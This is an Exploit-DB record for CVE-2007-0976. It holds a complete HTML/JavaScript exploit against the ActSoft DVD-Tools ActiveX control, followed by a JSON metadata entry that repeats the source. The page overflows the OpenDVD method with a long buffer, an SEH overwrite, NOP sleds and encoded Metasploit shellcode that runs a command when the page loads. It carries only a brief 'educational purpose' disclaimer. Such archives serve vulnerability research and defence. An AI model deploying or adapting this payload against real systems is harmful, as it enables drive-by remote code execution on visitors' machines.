ID EDB-ID:3610 Type exploitdb Reporter Umesh Wanve Modified 2007-03-30T00:00:00
Description
ActSoft DVD-Tools (dvdtools.ocx) Remote Buffer Overflow Exploit. CVE-2007-0976. Remote exploit for windows platform
<!--
===============================================================================================
ActSoft DVD-Tools (dvdtools.ocx) Buffer Overflow Exploit
By Umesh Wanve
==============================================================================================
Date : 30-03-2007
Tested on Windows 2000 SP4 Server English
Windows 2000 SP4 Professional English
PS. This was written for educational purpose. Use it at your own risk.Author will be not be
responsible for any damage.
Always thanks to Metasploit and Stroke
-->
<html>
<title>
ActSoft DVD-Tools (dvdtools.ocx) Buffer Overflow Exploit- By Umesh Wanve
</title>
<object classid='clsid:894A633E-F261-28BD-96F3-380EBEE1BADE' id='test' ></object>
<script>
var nop=unescape("%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90");
var pointer_to_seh=unescape("%eb%06%90%90");
var seh_handler=unescape("%a9%11%02%75");
<!-- win32_exec - EXITFUNC=seh CMD=calc Size=330 Encoder=Alpha2 http://metasploit.com -->
var shellcode=
unescape("%eb%03%59%eb%05%e8%f8%ff%ff%ff%49%49%49%49%49%49")+
unescape("%49%49%49%49%49%49%49%49%49%48%49%49%51%5a%6a%64")+
unescape("%58%30%41%31%50%42%41%6b%41%41%74%32%41%42%41%32")+
unescape("%42%41%30%42%41%58%38%41%42%50%75%4a%49%6b%4c%79")+
unescape("%78%67%34%45%50%43%30%73%30%4c%4b%72%65%55%6c%4c")+
unescape("%4b%53%4c%53%35%70%78%54%41%7a%4f%6c%4b%72%6f%42")+
unescape("%38%6e%6b%51%4f%35%70%57%71%7a%4b%43%79%4c%4b%77")+
unescape("%44%4e%6b%74%41%48%6e%50%31%79%50%6d%49%6e%4c%6b")+
unescape("%34%6b%70%53%44%76%67%6a%61%4a%6a%44%4d%54%41%5a")+
unescape("%62%6a%4b%4b%44%37%4b%61%44%71%34%65%54%32%55%58")+
unescape("%65%6e%6b%63%6f%55%74%34%41%4a%4b%70%66%6e%6b%54")+
unescape("%4c%70%4b%6e%6b%73%6f%45%4c%76%61%78%6b%6c%4b%55")+
unescape("%4c%4c%4b%44%41%48%6b%4d%59%73%6c%57%54%75%54%6a")+
unescape("%63%54%71%4b%70%65%34%6c%4b%37%30%54%70%6c%45%4f")+
unescape("%30%73%48%54%4c%4e%6b%37%30%74%4c%4c%4b%50%70%67")+
unescape("%6c%4c%6d%4c%4b%62%48%45%58%38%6b%76%69%6e%6b%4f")+
unescape("%70%4e%50%45%50%47%70%37%70%6c%4b%32%48%47%4c%51")+
unescape("%4f%30%31%6b%46%43%50%61%46%6e%69%48%78%6d%53%4f")+
unescape("%30%61%6b%66%30%31%78%58%70%4d%5a%34%44%61%4f%55")+
unescape("%38%6e%78%6b%4e%6d%5a%34%4e%73%67%49%6f%6d%37%33")+
unescape("%53%31%71%70%6c%65%33%45%50%64");
var buff="";
for (i=0;i<432;i++) buff=buff+"A";
<!-- Buffer ------ Short Jump to Shellcode ----- Pop Pop ret ---- NOP SLED ---- Hellcode --------->
buff = buff + pointer_to_seh + seh_handler + nop+nop + shellcode +nop+nop;
var attack = document.getElementById('test');
attack.OpenDVD(buff);
</script>
</body>
</html>
# milw0rm.com [2007-03-30]
{"id": "EDB-ID:3610", "type": "exploitdb", "bulletinFamily": "exploit", "title": "ActSoft DVD-Tools dvdtools.ocx Remote Buffer Overflow Exploit", "description": "ActSoft DVD-Tools (dvdtools.ocx) Remote Buffer Overflow Exploit. CVE-2007-0976. Remote exploit for windows platform", "published": "2007-03-30T00:00:00", "modified": "2007-03-30T00:00:00", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "href": "https://www.exploit-db.com/exploits/3610/", "reporter": "Umesh Wanve", "references": [], "cvelist": ["CVE-2007-0976"], "lastseen": "2016-01-31T18:54:26", "viewCount": 6, "enchantments": {"score": {"value": 8.3, "vector": "NONE", "modified": "2016-01-31T18:54:26", "rev": 2}, "dependencies": {"references": [{"type": "cve", "idList": ["CVE-2007-0976"]}, {"type": "exploitdb", "idList": ["EDB-ID:3844", "EDB-ID:3307"]}, {"type": "osvdb", "idList": ["OSVDB:33732"]}, {"type": "securityvulns", "idList": ["SECURITYVULNS:VULN:7251"]}], "modified": "2016-01-31T18:54:26", "rev": 2}, "vulnersScore": 8.3}, "sourceHref": "https://www.exploit-db.com/download/3610/", "sourceData": "<!--\r\n\r\n ===============================================================================================\r\n ActSoft DVD-Tools (dvdtools.ocx) Buffer Overflow Exploit\r\n By Umesh Wanve \r\n ============================================================================================== \r\n \r\n Date : 30-03-2007\r\n \r\n Tested on Windows 2000 SP4 Server English\r\n Windows 2000 SP4 Professional English\r\n \r\n \r\n PS. This was written for educational purpose. Use it at your own risk.Author will be not be\r\n responsible for any damage.\r\n \r\n Always thanks to Metasploit and Stroke \r\n\r\n-->\r\n\r\n\r\n\r\n<html>\r\n\r\n<title>\r\n ActSoft DVD-Tools (dvdtools.ocx) Buffer Overflow Exploit- By Umesh Wanve\r\n</title>\r\n\r\n<object classid='clsid:894A633E-F261-28BD-96F3-380EBEE1BADE' id='test' ></object>\r\n\r\n<script>\r\n\r\nvar nop=unescape(\"%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90\");\r\n\r\nvar pointer_to_seh=unescape(\"%eb%06%90%90\");\r\n\r\nvar seh_handler=unescape(\"%a9%11%02%75\");\r\n\r\n\r\n<!-- win32_exec - EXITFUNC=seh CMD=calc Size=330 Encoder=Alpha2 http://metasploit.com -->\r\nvar shellcode= \r\nunescape(\"%eb%03%59%eb%05%e8%f8%ff%ff%ff%49%49%49%49%49%49\")+\r\nunescape(\"%49%49%49%49%49%49%49%49%49%48%49%49%51%5a%6a%64\")+\r\nunescape(\"%58%30%41%31%50%42%41%6b%41%41%74%32%41%42%41%32\")+\r\nunescape(\"%42%41%30%42%41%58%38%41%42%50%75%4a%49%6b%4c%79\")+\r\nunescape(\"%78%67%34%45%50%43%30%73%30%4c%4b%72%65%55%6c%4c\")+\r\nunescape(\"%4b%53%4c%53%35%70%78%54%41%7a%4f%6c%4b%72%6f%42\")+\r\nunescape(\"%38%6e%6b%51%4f%35%70%57%71%7a%4b%43%79%4c%4b%77\")+\r\nunescape(\"%44%4e%6b%74%41%48%6e%50%31%79%50%6d%49%6e%4c%6b\")+\r\nunescape(\"%34%6b%70%53%44%76%67%6a%61%4a%6a%44%4d%54%41%5a\")+\r\nunescape(\"%62%6a%4b%4b%44%37%4b%61%44%71%34%65%54%32%55%58\")+\r\nunescape(\"%65%6e%6b%63%6f%55%74%34%41%4a%4b%70%66%6e%6b%54\")+\r\nunescape(\"%4c%70%4b%6e%6b%73%6f%45%4c%76%61%78%6b%6c%4b%55\")+\r\nunescape(\"%4c%4c%4b%44%41%48%6b%4d%59%73%6c%57%54%75%54%6a\")+\r\nunescape(\"%63%54%71%4b%70%65%34%6c%4b%37%30%54%70%6c%45%4f\")+\r\nunescape(\"%30%73%48%54%4c%4e%6b%37%30%74%4c%4c%4b%50%70%67\")+\r\nunescape(\"%6c%4c%6d%4c%4b%62%48%45%58%38%6b%76%69%6e%6b%4f\")+\r\nunescape(\"%70%4e%50%45%50%47%70%37%70%6c%4b%32%48%47%4c%51\")+\r\nunescape(\"%4f%30%31%6b%46%43%50%61%46%6e%69%48%78%6d%53%4f\")+\r\nunescape(\"%30%61%6b%66%30%31%78%58%70%4d%5a%34%44%61%4f%55\")+\r\nunescape(\"%38%6e%78%6b%4e%6d%5a%34%4e%73%67%49%6f%6d%37%33\")+\r\nunescape(\"%53%31%71%70%6c%65%33%45%50%64\");\r\n\r\nvar buff=\"\";\r\n\r\nfor (i=0;i<432;i++) buff=buff+\"A\";\r\n\r\n\r\n<!-- Buffer ------ Short Jump to Shellcode ----- Pop Pop ret ---- NOP SLED ---- Hellcode --------->\r\n\r\nbuff = buff + pointer_to_seh + seh_handler + nop+nop + shellcode +nop+nop;\r\n\r\n\r\nvar attack = document.getElementById('test');\r\n\r\nattack.OpenDVD(buff);\r\n\r\n\r\n</script>\r\n</body>\r\n</html>\r\n\r\n# milw0rm.com [2007-03-30]\r\n", "osvdbidlist": ["33732"]}